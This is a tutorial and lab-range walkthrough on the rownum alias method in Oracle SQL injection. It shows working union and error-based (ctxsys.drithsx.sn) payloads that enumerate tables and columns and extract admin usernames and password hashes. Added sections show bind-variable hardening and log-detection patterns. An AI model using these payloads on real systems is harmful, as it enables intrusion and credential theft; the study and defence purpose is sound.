Detailed example of the use of alias method in Oracle database injection
This article introduces the alias method used in Oracle database injection: the basic statements for querying Oracle information, the behaviour of rownum, and related features. I hope it will be helpful to everyone.
Recommended tutorial: "Oracle Video Tutorial"
1. Introduction to Oracle Database
Oracle Database, also known as Oracle RDBMS or simply Oracle, is a product of Oracle Corporation. It is powerful but complex to operate; the software itself is free to use, but support services are paid. In China it is currently used mainly by large organisations such as banks, financial institutions and companies in the big-data industry.
Summary of Oracle features:
1. Oracle requires a table name after from in every query, similar to Access. If no real table is needed, use the dual table. Dual is Oracle's virtual table, provided so that a select statement is syntactically complete. Oracle guarantees that dual always contains exactly one row; querying it directly shows a single row whose only column, DUMMY, holds the value 'X'.
2. In a union query, the data type at each position must match the data type of the corresponding column in the table. NULL can be used at positions whose data type cannot be guessed quickly. This is similar to SQL Server.
3. Unlike MySQL, Oracle has no limit clause for paging; paging is implemented with three layers of nested queries instead.
4. Oracle's single-line comment symbol is --, and its multi-line comment symbols are /* and */.
5. The Oracle database contains several system tables that store the table names and column names of the database, such as user_tab_columns, all_tab_columns, all_tables and user_tables. These system tables hold all of the user's tables and column names: table_name is the table name and column_name is the column name.
6. Oracle concatenates strings with ||, written as %7C%7C when URL-encoded; the concat() function can also join two strings.
7. In Oracle the notion of a database (library) is weakened and the notion of a user is strengthened; data is separated mainly by user. Put simply, the current user name plays the role that the database name plays in other databases.
2. Introduction to the alias method
(1) Basic statements for querying Oracle information
select * from all_tables: query all tables
select * from user_tables: query all tables of the current user
select * from all_tab_columns: query all fields
select * from user_tab_columns: query the fields of the current user
select * from v$version: check the Oracle version in use
Running select * from all_tables, the page outputs a lot of data, most of which is not what we need. Suppose I only want the first 4 rows; then modify the statement as follows:
select * from all_tables where rownum <= 4
Now suppose we only need the second row. Can we enter where rownum=2? No. rownum is not a column of any table but the row number of the query result: as each row of the result is produced it is numbered 1, 2, 3 and so on. rownum is that number and belongs to no column, so it is a pseudo-column that always starts at 1; a condition such as rownum>n or rownum=n with n>1 can never be satisfied. For this situation two methods can be used: the inequality method and the alias method.
When writing queries we often need to return the first n records of a table or a block from the middle. For example, in a large table (say 10,000 rows) we need the records from 1000 to 1005. How should such a query be handled? Each database has its own solution: MySQL pages results with limit, MSSQL with TOP, and Oracle mainly uses rownum. Let's look at how to output specified rows in Oracle.
(3) Inequality method
Enter this command on the online Oracle practice platform (it queries all fields of the current user): select * from user_tab_columns
The result shows all current tables and their field names. If I only want the contents of the ADMIN table, I can enter: select * from user_tab_columns where table_name='ADMIN'
If I only want the second row, how should I write it? Adding the condition rownum=2 directly clearly does not work. Here the inequality method can be used: select * from user_tab_columns where table_name='ADMIN' and COLUMN_NAME<>'UNAME'
This also shows the drawback of the inequality method: it is only usable when the amount of data is very small. With a large amount of data, the alias method introduced below is needed.
(4) Alias method
Look at this statement: select column_name,rownum n from user_tab_columns
After this statement queries the column names, the results are numbered in order from top to bottom starting at 1. Because rownum is not itself a column, it is given the alias n here. The statement therefore returns each column name together with its row number, with the row numbers collected in the field n.
Note that although we have now created a field n holding the row number, adding a condition directly afterwards, such as where n=7, does not work: n only exists once this statement has been executed. To query using the field n, the whole statement must be placed as a subquery inside another statement; once the inner statement has run, the field n exists and the outer statement can use it.
Now query the fields of the ADMIN table first. Enter: select column_name,rownum n from user_tab_columns where table_name='ADMIN'
The result has two columns: the first is the actual field name and the second is the row number under the alias n we chose.
For example, the result of the subquery is:
field name | row number
---|---
aa | 1
bb | 2
cc | 3
dd | 4
Then simply enter select * from subquery where n=2 to get the row bb. Likewise, whichever row you want, set n to the corresponding number.
So as long as this statement is written as a subquery and an outer query selects from it with n=2, the second field is obtained. Enter: select * from (select column_name,rownum n from user_tab_columns where table_name='ADMIN') where n=2
The second field is successfully queried.
Note: when giving rownum the alias n, the standard form is rownum as n; the shorter form rownum n, separated by a space, also works.
You can use the alias method when querying fields, but can you use it when querying table names? The answer is yes.
Example: select table_name,rownum n from user_tables
Aliasing when querying table names works the same way as aliasing when querying fields; the usage is similar, so it is not repeated here.
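The rownum behaviour and the alias method described in this section, as an added Oracle SQL example that is not part of the original article: it builds a small constructed table (demo_cols, an assumed name), shows why where rownum = 2 returns nothing, how the alias subquery selects the second row, and how the same pattern pages a window of rows as in the 1000 to 1005 case mentioned earlier. The last statement goes beyond the article and uses the row-limiting syntax available from Oracle 12c.

```sql
-- Constructed sample table (assumed name, not the article's lab data):
-- twelve rows named COL_01 .. COL_12.
CREATE TABLE demo_cols (column_name VARCHAR2(30));
INSERT INTO demo_cols (column_name)
  SELECT 'COL_' || LPAD(LEVEL, 2, '0') FROM dual CONNECT BY LEVEL <= 12;
COMMIT;

-- rownum is assigned to each row as it passes the WHERE clause. The first
-- candidate row gets rownum 1, fails "= 2" and is discarded, and the next
-- candidate is numbered 1 again, so this query never returns a row.
SELECT column_name FROM demo_cols WHERE rownum = 2;

-- A predicate that starts at 1 works: this returns the first four rows.
SELECT column_name FROM demo_cols WHERE rownum <= 4;

-- Alias method: number the rows in an inner query, then filter on the
-- alias in the outer query, where n is an ordinary column. Selects row 2.
SELECT column_name
FROM (SELECT column_name, rownum AS n FROM demo_cols)
WHERE n = 2;

-- The same idea as three nested layers for a window of rows (rows 5 to 8).
-- The innermost ORDER BY is what makes the numbering deterministic; without
-- it, "the second row" is whatever order the optimizer happens to return.
SELECT column_name
FROM (SELECT t.column_name, rownum AS n
      FROM (SELECT column_name FROM demo_cols ORDER BY column_name) t
      WHERE rownum <= 8)
WHERE n >= 5;

-- Oracle 12c and later also offer row-limiting syntax (the article's remark
-- that Oracle has no LIMIT refers to older versions). Same rows 5 to 8.
SELECT column_name FROM demo_cols ORDER BY column_name
OFFSET 4 ROWS FETCH NEXT 4 ROWS ONLY;
```

The ordering caveat matters for the article's method as well: the dictionary views (user_tables, user_tab_columns) carry no guaranteed order, so "row n" of an unordered subquery may change between executions or Oracle versions; adding an ORDER BY in the innermost query makes the numbering stable.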
3. Practical operation on a lab range
The above is just the theoretical basis; real operation is not that easy. Let's find a lab range and try it out.
Take Fengshentai as an example, the address is http://o1.lab.aqlab.cn/?id=1
(1) Determine whether SQL injection exists
On entering the range we see a GET parameter in the address bar, so first test whether SQL injection is present:
Enter after id=1:
and 1=1, the page echoes normally
and 1=2, the page echo is abnormal
Change id=1 to id=2-1, and the page echoes normally.
This means SQL injection definitely exists.
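The id=2-1 test works only because the parameter value is spliced into the SQL text, so the server evaluates the arithmetic inside its own query. As an added example from the defender's side (not code from the article or the range), the following PL/SQL shows the vulnerable concatenated form next to a bind-variable form; the table news and the two function names are assumed.

```sql
-- Constructed schema for the demonstration (assumed names, not the range's data).
CREATE TABLE news (id NUMBER PRIMARY KEY, title VARCHAR2(200));
INSERT INTO news (id, title) VALUES (1, 'first');
INSERT INTO news (id, title) VALUES (2, 'second');
COMMIT;

-- Vulnerable form: the request parameter becomes part of the SQL text, so
-- '2-1' is evaluated as arithmetic and a suffix such as ' and 1=2' becomes
-- a predicate. This is the pattern the boolean and arithmetic tests detect.
CREATE OR REPLACE FUNCTION news_title_unsafe(p_id IN VARCHAR2) RETURN VARCHAR2 IS
  v_title VARCHAR2(200);
BEGIN
  EXECUTE IMMEDIATE 'SELECT title FROM news WHERE id = ' || p_id INTO v_title;
  RETURN v_title;
END;
/

-- Hardened form: the SQL text is fixed and the parameter travels as a bind
-- variable. '2-1' is now just a string value; TO_NUMBER rejects it with
-- ORA-01722 instead of the database evaluating it as an expression.
CREATE OR REPLACE FUNCTION news_title_safe(p_id IN VARCHAR2) RETURN VARCHAR2 IS
  v_title VARCHAR2(200);
BEGIN
  EXECUTE IMMEDIATE 'SELECT title FROM news WHERE id = TO_NUMBER(:1)'
    INTO v_title USING p_id;
  RETURN v_title;
END;
/

-- Arithmetic is evaluated inside the statement: this behaves like id = 1.
SELECT news_title_unsafe('2-1') FROM dual;
-- Normal use of the hardened function.
SELECT news_title_safe('1') FROM dual;
-- The same probe against the hardened function fails the number conversion
-- and never changes the query's structure.
SELECT news_title_safe('2-1') FROM dual;
```

The difference between "page echoes normally" and "page echo is abnormal" in the test above is exactly the difference between these two functions: with the bind form, the response to id=2-1 is an error or an empty result every time, so the probe gives the tester no signal.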
(2) Query the number of fields on the current page
In a real engagement we do not know what database the target site uses, so rather than worry about it, treat it as MySQL for now. First query the number of fields:
Enter order by 1, the page echoes normally;
Enter order by 5, the page echo is abnormal;
Enter order by 4, the page echoes normally;
Enter order by 5, the page echo is abnormal.
This indicates that the current page has 4 fields.
(3) Try joint query
Enter after id=1:
union all select 1,2,3,4
The page echoes abnormally, so the database is clearly not MySQL. Try changing the numbers to null:
union all select null,null,null,null from dual
The page echoes normally; the target database evidently has very strict syntax requirements. Now determine the data types of the four fields. Enter:
union all select 111,null,null,null from dual
The page returns normally, indicating that the first field is numeric. Press Ctrl+U to view the page source and search for 111; no obvious echo position (displaced output) is seen.
Try making the current page error to see whether an echo position appears:
and 1=2 union all select 111,null,null,null from dual
No obvious echo position is seen.
Continue to enter:
and 1=2 union all select 111,111,null,null from dual
The page returns an exception, indicating that the second field is not a numeric type.
Continue to enter:
and 1=2 union all select 111,'aa',null,null from dual
The page returns an exception, indicating that the second field is not of string type.
In fact, Oracle has many data types: numbers, strings, dates, binary, large text, and further subtypes of each. Trying them one by one is tedious, so it is skipped here.
The third field is the same: neither numeric nor string, and no obvious echo position.
Continue with the fourth field:
and 1=2 union all select 111,null,null,111111 from dual
The page now shows a new time.
Seeing a time like this should bring a timestamp to mind, since Unix time counts seconds from 1 January 1970 (00:00 UTC, which is 8 o'clock in Beijing time).
(4) Query table names
Use the error-based injection function to query information. Enter:
and 1=ctxsys.drithsx.sn(1,(select table_name from user_tables where rownum=1))
Note: error-based injection can only return one string rather than a table, so a restriction is needed at the end, namely rownum=1, which takes a single row. The 1 in the first argument of the function can be replaced by something else, either a number or a string.
This yields the table name ADMIN.
Continue to enter:
and 1=ctxsys.drithsx.sn(1,(select table_name from user_tables where rownum=1 and table_name<>'ADMIN'))
This yields the second table name, NEWS.
For the remaining tables the inequality method cannot be continued; instead, use the alias method described above to build a basic statement and then change the value of n to find the tables not yet identified:
and 1=ctxsys.drithsx.sn(1,(select table_name from (select table_name,rownum n from user_tables) where n=3))
The tables of the current user are finally determined to be: ADMIN, NEWS, MD5
(5) Query the field names
Next, query the fields. The ADMIN table is obviously the more likely one to hold the information we want, so query its contents first. Enter:
and 1=ctxsys.drithsx.sn('a',(select column_name from (select column_name,rownum as n from user_tab_columns) where n=1))
The first field name obtained is: UNAME
Change n to 2 and continue:
and 1=ctxsys.drithsx.sn('a',(select column_name from (select column_name,rownum as n from user_tab_columns) where n=2))
The second field is UPASS
Change n to 3 and continue:
and 1=ctxsys.drithsx.sn('a',(select column_name from (select column_name,rownum as n from user_tab_columns) where n=3))
The third field is MD5
Change n to 4 and continue:
and 1=ctxsys.drithsx.sn('a',(select column_name from (select column_name,rownum as n from user_tab_columns) where n=4))
No more results. So the fields of the ADMIN table are: UNAME, UPASS, MD5
(6) Query the actual data by field
With both the field names and the table name, next query the actual data. For convenience, again use the alias method:
and 1=ctxsys.drithsx.sn(1,(select UNAME from (select UNAME,rownum as n from ADMIN) where n=1))
Note the peculiarity of the error function: * cannot be used in place of UNAME here.
By changing the value of n, all user names in UNAME are obtained: OCI, NF, QQ123.
Continue querying the UPASS field in the same way. Enter:
and 1=ctxsys.drithsx.sn(1,(select UPASS from (select UPASS,rownum as n from ADMIN) where n=1))
Changing the value of n gives the three UPASS records: e10adc3949ba59abbe56e057f20f883e
2a61f8bcfe7535eadcfa69eb4406ceb9
654321
Decrypting them at cmd5.com gives, respectively:
123456, not found, 654321
(7) Submit the flag
Submitting each md5 value to the range, the flag is finally determined to be: 2a61f8bcfe7535eadcfa69eb4406ceb9
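Seen from the defender's side, the probes used in this section leave a recognisable trace in the web server's access log. As an added example (not from the article), an Oracle SQL query over a constructed request-log table classifies the patterns shown above: boolean and arithmetic probes, order by column counting, union probes, and the error-based function call together with dictionary views. The table name, its columns, the sample rows and the assumption that the query string is stored URL-decoded are mine.

```sql
-- Constructed access-log rows (not real traffic). Assumption: the query
-- string is stored URL-decoded; if %7C%7C, %20 and the like are still
-- encoded, decode them before matching.
WITH access_log AS (
  SELECT TIMESTAMP '2024-03-01 10:00:01' AS ts, '198.51.100.7' AS client_ip,
         'id=1' AS query_string FROM dual UNION ALL
  SELECT TIMESTAMP '2024-03-01 10:00:05', '198.51.100.7',
         'id=1 and 1=1' FROM dual UNION ALL
  SELECT TIMESTAMP '2024-03-01 10:00:09', '198.51.100.7',
         'id=2-1' FROM dual UNION ALL
  SELECT TIMESTAMP '2024-03-01 10:00:14', '198.51.100.7',
         'id=1 order by 5' FROM dual UNION ALL
  SELECT TIMESTAMP '2024-03-01 10:00:20', '198.51.100.7',
         'id=1 union all select null,null,null,null from dual' FROM dual UNION ALL
  SELECT TIMESTAMP '2024-03-01 10:00:31', '198.51.100.7',
         'id=1 and 1=ctxsys.drithsx.sn(1,(select table_name from (select table_name,rownum n from user_tables) where n=3))'
         FROM dual UNION ALL
  SELECT TIMESTAMP '2024-03-01 10:00:40', '203.0.113.9',
         'page=2' FROM dual
),
classified AS (
  -- Most specific indicators first; a request gets the first label it matches.
  SELECT ts, client_ip, query_string,
         CASE
           WHEN REGEXP_LIKE(query_string, 'ctxsys\.drithsx', 'i')
             THEN 'error-based function call'
           WHEN REGEXP_LIKE(query_string, 'union\s+(all\s+)?select', 'i')
             THEN 'union probe'
           WHEN REGEXP_LIKE(query_string, '(user|all)_(tables|tab_columns)|rownum', 'i')
             THEN 'dictionary / rownum enumeration'
           WHEN REGEXP_LIKE(query_string, 'order\s+by\s+\d', 'i')
             THEN 'column-count probe'
           WHEN REGEXP_LIKE(query_string, 'and\s+\d+\s*=\s*\d+', 'i')
             THEN 'boolean probe'
           WHEN REGEXP_LIKE(query_string, '^id=\d+[-+*/]\d+$')
             THEN 'arithmetic probe'
         END AS indicator
  FROM access_log
)
-- Flagged requests in time order, with a per-client count so that one
-- address sending the whole sequence stands out from a single stray match.
SELECT ts, client_ip, indicator, query_string,
       COUNT(*) OVER (PARTITION BY client_ip) AS flagged_from_ip
FROM classified
WHERE indicator IS NOT NULL
ORDER BY ts;
```

The benign rows (id=1 and page=2) receive no label and drop out; the five requests from 198.51.100.7 are labelled in the order the walkthrough issued them, which is the sequence a triage rule should key on rather than any single pattern. The arithmetic probe (id=2-1) is the hardest to match on its own, since it contains no SQL keyword; it is worth alerting on only in combination with the other indicators from the same client.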
4. Summary
When performing database injection, penetration testers always run into the problem of querying specific data. Although the query methods differ only slightly between databases, many details, if not handled well, make it very hard to complete the test. Every penetration tester therefore needs a solid theoretical foundation and command of every common method in order to handle real problems with ease.
This article focused on the characteristics of the Oracle database and the alias method commonly used in injection, shared the hands-on process of applying the alias method on a lab range, and shared an online platform for executing Oracle commands, in the hope of providing a reference for colleagues and enthusiasts solving related problems.